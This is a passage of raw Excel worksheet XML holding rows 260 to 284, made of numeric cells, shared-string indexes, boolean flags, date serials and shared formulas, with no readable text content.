        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S260" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="261">
      <c r="A261" s="1">
        <v>3538.0</v>
      </c>
      <c r="B261" s="2" t="s">
        <v>1339</v>
      </c>
      <c r="C261" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D261" s="2" t="s">
        <v>1340</v>
      </c>
      <c r="E261" s="2" t="s">
        <v>663</v>
      </c>
      <c r="F261" s="1" t="s">
        <v>1341</v>
      </c>
      <c r="G261" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H261" s="4">
        <v>43963.61666666667</v>
      </c>
      <c r="I261" s="1" t="s">
        <v>34</v>
      </c>
      <c r="J261" s="1" t="s">
        <v>1342</v>
      </c>
      <c r="K261" s="2" t="s">
        <v>1343</v>
      </c>
      <c r="L261" s="1">
        <v>10.0</v>
      </c>
      <c r="M261" s="1">
        <v>11.0</v>
      </c>
      <c r="N261" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O261" s="1" t="s">
        <v>1344</v>
      </c>
      <c r="P261" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q261" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R261" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S261" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="262">
      <c r="A262" s="1">
        <v>3549.0</v>
      </c>
      <c r="B262" s="2" t="s">
        <v>1345</v>
      </c>
      <c r="C262" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D262" s="2" t="s">
        <v>1346</v>
      </c>
      <c r="E262" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F262" s="1" t="s">
        <v>1347</v>
      </c>
      <c r="G262" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H262" s="4">
        <v>44229.191666666666</v>
      </c>
      <c r="I262" s="1" t="s">
        <v>1348</v>
      </c>
      <c r="J262" s="1" t="s">
        <v>1349</v>
      </c>
      <c r="K262" s="2" t="s">
        <v>1350</v>
      </c>
      <c r="L262" s="1">
        <v>1.0</v>
      </c>
      <c r="M262" s="1">
        <v>1.0</v>
      </c>
      <c r="N262" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O262" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P262" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q262" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R262" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S262" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="263">
      <c r="A263" s="1">
        <v>3552.0</v>
      </c>
      <c r="B263" s="2" t="s">
        <v>1351</v>
      </c>
      <c r="C263" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D263" s="2" t="s">
        <v>1352</v>
      </c>
      <c r="E263" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F263" s="1" t="s">
        <v>685</v>
      </c>
      <c r="G263" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H263" s="1" t="s">
        <v>1353</v>
      </c>
      <c r="I263" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J263" s="1" t="s">
        <v>1354</v>
      </c>
      <c r="K263" s="2" t="s">
        <v>1355</v>
      </c>
      <c r="L263" s="1">
        <v>1.0</v>
      </c>
      <c r="M263" s="1">
        <v>2.0</v>
      </c>
      <c r="N263" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O263" s="1" t="s">
        <v>487</v>
      </c>
      <c r="P263" s="1" t="s">
        <v>1356</v>
      </c>
      <c r="Q263" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R263" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S263" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="264">
      <c r="A264" s="1">
        <v>3553.0</v>
      </c>
      <c r="B264" s="2" t="s">
        <v>1357</v>
      </c>
      <c r="C264" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D264" s="2" t="s">
        <v>1358</v>
      </c>
      <c r="E264" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F264" s="1" t="s">
        <v>685</v>
      </c>
      <c r="G264" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H264" s="1" t="s">
        <v>1359</v>
      </c>
      <c r="I264" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J264" s="1" t="s">
        <v>1354</v>
      </c>
      <c r="K264" s="2" t="s">
        <v>1355</v>
      </c>
      <c r="L264" s="1">
        <v>1.0</v>
      </c>
      <c r="M264" s="1">
        <v>2.0</v>
      </c>
      <c r="N264" s="1" t="s">
        <v>487</v>
      </c>
      <c r="O264" s="1" t="s">
        <v>487</v>
      </c>
      <c r="P264" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q264" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R264" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S264" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="265">
      <c r="A265" s="1">
        <v>3554.0</v>
      </c>
      <c r="B265" s="2" t="s">
        <v>1360</v>
      </c>
      <c r="C265" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D265" s="2" t="s">
        <v>1361</v>
      </c>
      <c r="E265" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F265" s="1" t="s">
        <v>1362</v>
      </c>
      <c r="G265" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H265" s="1" t="s">
        <v>1363</v>
      </c>
      <c r="I265" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J265" s="1" t="s">
        <v>1364</v>
      </c>
      <c r="K265" s="2" t="s">
        <v>1365</v>
      </c>
      <c r="L265" s="1">
        <v>3.0</v>
      </c>
      <c r="M265" s="1">
        <v>4.0</v>
      </c>
      <c r="N265" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O265" s="1" t="s">
        <v>1366</v>
      </c>
      <c r="P265" s="1" t="s">
        <v>1367</v>
      </c>
      <c r="Q265" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R265" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S265" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="266">
      <c r="A266" s="1">
        <v>3555.0</v>
      </c>
      <c r="B266" s="7" t="s">
        <v>1368</v>
      </c>
      <c r="C266" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D266" s="2" t="s">
        <v>1369</v>
      </c>
      <c r="E266" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F266" s="1" t="s">
        <v>1370</v>
      </c>
      <c r="G266" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H266" s="1" t="s">
        <v>1371</v>
      </c>
      <c r="I266" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J266" s="1" t="s">
        <v>1364</v>
      </c>
      <c r="K266" s="2" t="s">
        <v>1365</v>
      </c>
      <c r="L266" s="1">
        <v>3.0</v>
      </c>
      <c r="M266" s="1">
        <v>4.0</v>
      </c>
      <c r="N266" s="1" t="s">
        <v>1372</v>
      </c>
      <c r="O266" s="1" t="s">
        <v>1366</v>
      </c>
      <c r="P266" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q266" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R266" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S266" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="267">
      <c r="A267" s="1">
        <v>3557.0</v>
      </c>
      <c r="B267" s="2" t="s">
        <v>1373</v>
      </c>
      <c r="C267" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D267" s="2" t="s">
        <v>1374</v>
      </c>
      <c r="E267" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F267" s="1" t="s">
        <v>1362</v>
      </c>
      <c r="G267" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H267" s="1" t="s">
        <v>1375</v>
      </c>
      <c r="I267" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J267" s="1" t="s">
        <v>1364</v>
      </c>
      <c r="K267" s="2" t="s">
        <v>1365</v>
      </c>
      <c r="L267" s="1">
        <v>3.0</v>
      </c>
      <c r="M267" s="1">
        <v>4.0</v>
      </c>
      <c r="N267" s="1" t="s">
        <v>1376</v>
      </c>
      <c r="O267" s="1" t="s">
        <v>1366</v>
      </c>
      <c r="P267" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q267" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R267" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S267" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="268">
      <c r="A268" s="1">
        <v>3558.0</v>
      </c>
      <c r="B268" s="2" t="s">
        <v>1377</v>
      </c>
      <c r="C268" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D268" s="2" t="s">
        <v>1378</v>
      </c>
      <c r="E268" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F268" s="1" t="s">
        <v>1379</v>
      </c>
      <c r="G268" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H268" s="4">
        <v>44055.8625</v>
      </c>
      <c r="I268" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J268" s="1" t="s">
        <v>1380</v>
      </c>
      <c r="K268" s="2" t="s">
        <v>1381</v>
      </c>
      <c r="L268" s="1">
        <v>1.0</v>
      </c>
      <c r="M268" s="1">
        <v>1.0</v>
      </c>
      <c r="N268" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O268" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P268" s="1" t="s">
        <v>1338</v>
      </c>
      <c r="Q268" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R268" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S268" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="269">
      <c r="A269" s="1">
        <v>3565.0</v>
      </c>
      <c r="B269" s="2" t="s">
        <v>1382</v>
      </c>
      <c r="C269" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D269" s="2" t="s">
        <v>1383</v>
      </c>
      <c r="E269" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F269" s="1" t="s">
        <v>159</v>
      </c>
      <c r="G269" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H269" s="1" t="s">
        <v>1384</v>
      </c>
      <c r="I269" s="1" t="s">
        <v>161</v>
      </c>
      <c r="J269" s="1" t="s">
        <v>1385</v>
      </c>
      <c r="K269" s="2" t="s">
        <v>1386</v>
      </c>
      <c r="L269" s="1">
        <v>1.0</v>
      </c>
      <c r="M269" s="1">
        <v>1.0</v>
      </c>
      <c r="N269" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O269" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P269" s="1" t="s">
        <v>369</v>
      </c>
      <c r="Q269" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R269" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S269" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="270">
      <c r="A270" s="1">
        <v>3879.0</v>
      </c>
      <c r="B270" s="2" t="s">
        <v>1387</v>
      </c>
      <c r="C270" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D270" s="2" t="s">
        <v>1388</v>
      </c>
      <c r="E270" s="2" t="s">
        <v>517</v>
      </c>
      <c r="F270" s="1" t="s">
        <v>1389</v>
      </c>
      <c r="G270" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H270" s="4">
        <v>44450.43680555555</v>
      </c>
      <c r="I270" s="1" t="s">
        <v>361</v>
      </c>
      <c r="J270" s="1" t="s">
        <v>1390</v>
      </c>
      <c r="K270" s="2" t="s">
        <v>1391</v>
      </c>
      <c r="L270" s="1">
        <v>3.0</v>
      </c>
      <c r="M270" s="1">
        <v>7.0</v>
      </c>
      <c r="N270" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O270" s="1" t="s">
        <v>1392</v>
      </c>
      <c r="P270" s="1" t="s">
        <v>369</v>
      </c>
      <c r="Q270" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R270" s="2">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="S270" s="1">
        <f t="shared" si="3"/>
        <v>7</v>
      </c>
    </row>
    <row r="271">
      <c r="A271" s="1">
        <v>3880.0</v>
      </c>
      <c r="B271" s="2" t="s">
        <v>1393</v>
      </c>
      <c r="C271" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D271" s="2" t="s">
        <v>1394</v>
      </c>
      <c r="E271" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F271" s="1" t="s">
        <v>1395</v>
      </c>
      <c r="G271" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H271" s="4">
        <v>44450.49930555555</v>
      </c>
      <c r="I271" s="1" t="s">
        <v>361</v>
      </c>
      <c r="J271" s="1" t="s">
        <v>1390</v>
      </c>
      <c r="K271" s="2" t="s">
        <v>1391</v>
      </c>
      <c r="L271" s="1">
        <v>3.0</v>
      </c>
      <c r="M271" s="1">
        <v>7.0</v>
      </c>
      <c r="N271" s="1" t="s">
        <v>334</v>
      </c>
      <c r="O271" s="1" t="s">
        <v>1392</v>
      </c>
      <c r="P271" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q271" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R271" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S271" s="1">
        <f t="shared" si="3"/>
        <v>7</v>
      </c>
    </row>
    <row r="272">
      <c r="A272" s="1">
        <v>3881.0</v>
      </c>
      <c r="B272" s="2" t="s">
        <v>1396</v>
      </c>
      <c r="C272" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D272" s="2" t="s">
        <v>1397</v>
      </c>
      <c r="E272" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F272" s="1" t="s">
        <v>1389</v>
      </c>
      <c r="G272" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H272" s="5">
        <v>44480.404861111114</v>
      </c>
      <c r="I272" s="1" t="s">
        <v>361</v>
      </c>
      <c r="J272" s="1" t="s">
        <v>1390</v>
      </c>
      <c r="K272" s="2" t="s">
        <v>1391</v>
      </c>
      <c r="L272" s="1">
        <v>3.0</v>
      </c>
      <c r="M272" s="1">
        <v>7.0</v>
      </c>
      <c r="N272" s="1" t="s">
        <v>1398</v>
      </c>
      <c r="O272" s="1" t="s">
        <v>1392</v>
      </c>
      <c r="P272" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q272" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R272" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S272" s="1">
        <f t="shared" si="3"/>
        <v>7</v>
      </c>
    </row>
    <row r="273">
      <c r="A273" s="1">
        <v>3882.0</v>
      </c>
      <c r="B273" s="2" t="s">
        <v>1399</v>
      </c>
      <c r="C273" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D273" s="2" t="s">
        <v>1400</v>
      </c>
      <c r="E273" s="2" t="s">
        <v>1401</v>
      </c>
      <c r="F273" s="1" t="s">
        <v>1402</v>
      </c>
      <c r="G273" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H273" s="5">
        <v>44511.93402777778</v>
      </c>
      <c r="I273" s="1" t="s">
        <v>361</v>
      </c>
      <c r="J273" s="1" t="s">
        <v>1390</v>
      </c>
      <c r="K273" s="2" t="s">
        <v>1391</v>
      </c>
      <c r="L273" s="1">
        <v>3.0</v>
      </c>
      <c r="M273" s="1">
        <v>7.0</v>
      </c>
      <c r="N273" s="1" t="s">
        <v>1403</v>
      </c>
      <c r="O273" s="1" t="s">
        <v>1392</v>
      </c>
      <c r="P273" s="1" t="s">
        <v>369</v>
      </c>
      <c r="Q273" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R273" s="2">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="S273" s="1">
        <f t="shared" si="3"/>
        <v>7</v>
      </c>
    </row>
    <row r="274">
      <c r="A274" s="1">
        <v>3883.0</v>
      </c>
      <c r="B274" s="2" t="s">
        <v>1404</v>
      </c>
      <c r="C274" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D274" s="2" t="s">
        <v>1400</v>
      </c>
      <c r="E274" s="2" t="s">
        <v>1401</v>
      </c>
      <c r="F274" s="1" t="s">
        <v>1402</v>
      </c>
      <c r="G274" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H274" s="5">
        <v>44511.93819444445</v>
      </c>
      <c r="I274" s="1" t="s">
        <v>361</v>
      </c>
      <c r="J274" s="1" t="s">
        <v>1390</v>
      </c>
      <c r="K274" s="2" t="s">
        <v>1391</v>
      </c>
      <c r="L274" s="1">
        <v>3.0</v>
      </c>
      <c r="M274" s="1">
        <v>7.0</v>
      </c>
      <c r="N274" s="1" t="s">
        <v>187</v>
      </c>
      <c r="O274" s="1" t="s">
        <v>1392</v>
      </c>
      <c r="P274" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q274" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R274" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S274" s="1">
        <f t="shared" si="3"/>
        <v>7</v>
      </c>
    </row>
    <row r="275">
      <c r="A275" s="1">
        <v>3885.0</v>
      </c>
      <c r="B275" s="2" t="s">
        <v>1405</v>
      </c>
      <c r="C275" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D275" s="2" t="s">
        <v>1406</v>
      </c>
      <c r="E275" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F275" s="1" t="s">
        <v>1389</v>
      </c>
      <c r="G275" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H275" s="1" t="s">
        <v>1407</v>
      </c>
      <c r="I275" s="1" t="s">
        <v>361</v>
      </c>
      <c r="J275" s="1" t="s">
        <v>1390</v>
      </c>
      <c r="K275" s="2" t="s">
        <v>1391</v>
      </c>
      <c r="L275" s="1">
        <v>3.0</v>
      </c>
      <c r="M275" s="1">
        <v>7.0</v>
      </c>
      <c r="N275" s="1" t="s">
        <v>1408</v>
      </c>
      <c r="O275" s="1" t="s">
        <v>1392</v>
      </c>
      <c r="P275" s="1" t="s">
        <v>1409</v>
      </c>
      <c r="Q275" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R275" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S275" s="1">
        <f t="shared" si="3"/>
        <v>7</v>
      </c>
    </row>
    <row r="276">
      <c r="A276" s="1">
        <v>3933.0</v>
      </c>
      <c r="B276" s="2" t="s">
        <v>1410</v>
      </c>
      <c r="C276" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D276" s="2" t="s">
        <v>1411</v>
      </c>
      <c r="E276" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F276" s="1" t="s">
        <v>685</v>
      </c>
      <c r="G276" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H276" s="1" t="s">
        <v>1412</v>
      </c>
      <c r="I276" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J276" s="1" t="s">
        <v>1413</v>
      </c>
      <c r="K276" s="2" t="s">
        <v>1414</v>
      </c>
      <c r="L276" s="1">
        <v>2.0</v>
      </c>
      <c r="M276" s="1">
        <v>2.0</v>
      </c>
      <c r="N276" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O276" s="1" t="s">
        <v>1415</v>
      </c>
      <c r="P276" s="1" t="s">
        <v>1416</v>
      </c>
      <c r="Q276" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R276" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S276" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="277">
      <c r="A277" s="1">
        <v>3934.0</v>
      </c>
      <c r="B277" s="2" t="s">
        <v>1417</v>
      </c>
      <c r="C277" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D277" s="2" t="s">
        <v>1418</v>
      </c>
      <c r="E277" s="2" t="s">
        <v>663</v>
      </c>
      <c r="F277" s="1" t="s">
        <v>112</v>
      </c>
      <c r="G277" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H277" s="4">
        <v>44294.938888888886</v>
      </c>
      <c r="I277" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J277" s="1" t="s">
        <v>1413</v>
      </c>
      <c r="K277" s="2" t="s">
        <v>1414</v>
      </c>
      <c r="L277" s="1">
        <v>2.0</v>
      </c>
      <c r="M277" s="1">
        <v>2.0</v>
      </c>
      <c r="N277" s="1" t="s">
        <v>1415</v>
      </c>
      <c r="O277" s="1" t="s">
        <v>1415</v>
      </c>
      <c r="P277" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q277" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R277" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S277" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="278">
      <c r="A278" s="1">
        <v>3950.0</v>
      </c>
      <c r="B278" s="2" t="s">
        <v>1419</v>
      </c>
      <c r="C278" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D278" s="2" t="s">
        <v>1420</v>
      </c>
      <c r="E278" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F278" s="1" t="s">
        <v>1421</v>
      </c>
      <c r="G278" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H278" s="1" t="s">
        <v>1422</v>
      </c>
      <c r="I278" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J278" s="1" t="s">
        <v>1423</v>
      </c>
      <c r="K278" s="2" t="s">
        <v>1424</v>
      </c>
      <c r="L278" s="1">
        <v>3.0</v>
      </c>
      <c r="M278" s="1">
        <v>4.0</v>
      </c>
      <c r="N278" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O278" s="1" t="s">
        <v>1425</v>
      </c>
      <c r="P278" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q278" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R278" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S278" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="279">
      <c r="A279" s="1">
        <v>3951.0</v>
      </c>
      <c r="B279" s="2" t="s">
        <v>1426</v>
      </c>
      <c r="C279" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D279" s="2" t="s">
        <v>1427</v>
      </c>
      <c r="E279" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F279" s="1" t="s">
        <v>1428</v>
      </c>
      <c r="G279" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H279" s="1" t="s">
        <v>1429</v>
      </c>
      <c r="I279" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J279" s="1" t="s">
        <v>1423</v>
      </c>
      <c r="K279" s="2" t="s">
        <v>1424</v>
      </c>
      <c r="L279" s="1">
        <v>3.0</v>
      </c>
      <c r="M279" s="1">
        <v>4.0</v>
      </c>
      <c r="N279" s="1" t="s">
        <v>1430</v>
      </c>
      <c r="O279" s="1" t="s">
        <v>1425</v>
      </c>
      <c r="P279" s="1" t="s">
        <v>1416</v>
      </c>
      <c r="Q279" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R279" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S279" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="280">
      <c r="A280" s="1">
        <v>3952.0</v>
      </c>
      <c r="B280" s="2" t="s">
        <v>1431</v>
      </c>
      <c r="C280" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D280" s="6" t="s">
        <v>1420</v>
      </c>
      <c r="E280" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F280" s="1" t="s">
        <v>1432</v>
      </c>
      <c r="G280" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H280" s="1" t="s">
        <v>1433</v>
      </c>
      <c r="I280" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J280" s="1" t="s">
        <v>1423</v>
      </c>
      <c r="K280" s="2" t="s">
        <v>1424</v>
      </c>
      <c r="L280" s="1">
        <v>3.0</v>
      </c>
      <c r="M280" s="1">
        <v>4.0</v>
      </c>
      <c r="N280" s="1" t="s">
        <v>1434</v>
      </c>
      <c r="O280" s="1" t="s">
        <v>1425</v>
      </c>
      <c r="P280" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q280" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R280" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S280" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="281">
      <c r="A281" s="1">
        <v>3954.0</v>
      </c>
      <c r="B281" s="2" t="s">
        <v>1435</v>
      </c>
      <c r="C281" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D281" s="2" t="s">
        <v>1436</v>
      </c>
      <c r="E281" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F281" s="1" t="s">
        <v>159</v>
      </c>
      <c r="G281" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H281" s="1" t="s">
        <v>1437</v>
      </c>
      <c r="I281" s="1" t="s">
        <v>161</v>
      </c>
      <c r="J281" s="1" t="s">
        <v>1438</v>
      </c>
      <c r="K281" s="2" t="s">
        <v>1439</v>
      </c>
      <c r="L281" s="1">
        <v>1.0</v>
      </c>
      <c r="M281" s="1">
        <v>1.0</v>
      </c>
      <c r="N281" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O281" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P281" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q281" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R281" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S281" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="282">
      <c r="A282" s="1">
        <v>4052.0</v>
      </c>
      <c r="B282" s="2" t="s">
        <v>1440</v>
      </c>
      <c r="C282" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D282" s="2" t="s">
        <v>1441</v>
      </c>
      <c r="E282" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F282" s="1" t="s">
        <v>1442</v>
      </c>
      <c r="G282" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H282" s="1" t="s">
        <v>1443</v>
      </c>
      <c r="I282" s="1" t="s">
        <v>814</v>
      </c>
      <c r="J282" s="1" t="s">
        <v>1444</v>
      </c>
      <c r="K282" s="2" t="s">
        <v>1445</v>
      </c>
      <c r="L282" s="1">
        <v>11.0</v>
      </c>
      <c r="M282" s="1">
        <v>16.0</v>
      </c>
      <c r="N282" s="1" t="s">
        <v>199</v>
      </c>
      <c r="O282" s="1" t="s">
        <v>1446</v>
      </c>
      <c r="P282" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q282" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R282" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S282" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="283">
      <c r="A283" s="1">
        <v>4076.0</v>
      </c>
      <c r="B283" s="2" t="s">
        <v>1447</v>
      </c>
      <c r="C283" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D283" s="2" t="s">
        <v>1448</v>
      </c>
      <c r="E283" s="2" t="s">
        <v>99</v>
      </c>
      <c r="F283" s="1" t="s">
        <v>1449</v>
      </c>
      <c r="G283" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H283" s="4">
        <v>44357.27847222222</v>
      </c>
      <c r="I283" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J283" s="1" t="s">
        <v>1450</v>
      </c>
      <c r="K283" s="2" t="s">
        <v>1451</v>
      </c>
      <c r="L283" s="1">
        <v>7.0</v>
      </c>
      <c r="M283" s="1">
        <v>8.0</v>
      </c>
      <c r="N283" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O283" s="1" t="s">
        <v>1452</v>
      </c>
      <c r="P283" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q283" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R283" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S283" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="284">
      <c r="A284" s="1">
        <v>4077.0</v>
      </c>
      <c r="B284" s="2" t="s">
        <v>1453</v>
      </c>
      <c r="C284" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D284" s="2" t="s">
        <v>1454</v>
      </c>
      <c r="E284" s="2" t="s">
        <v>42</v>
      </c>
      <c r="F284" s="1" t="s">
        <v>1455</v>
      </c>
      <c r="G284" s="1" t="b">
        <v>0</v>
      </c>
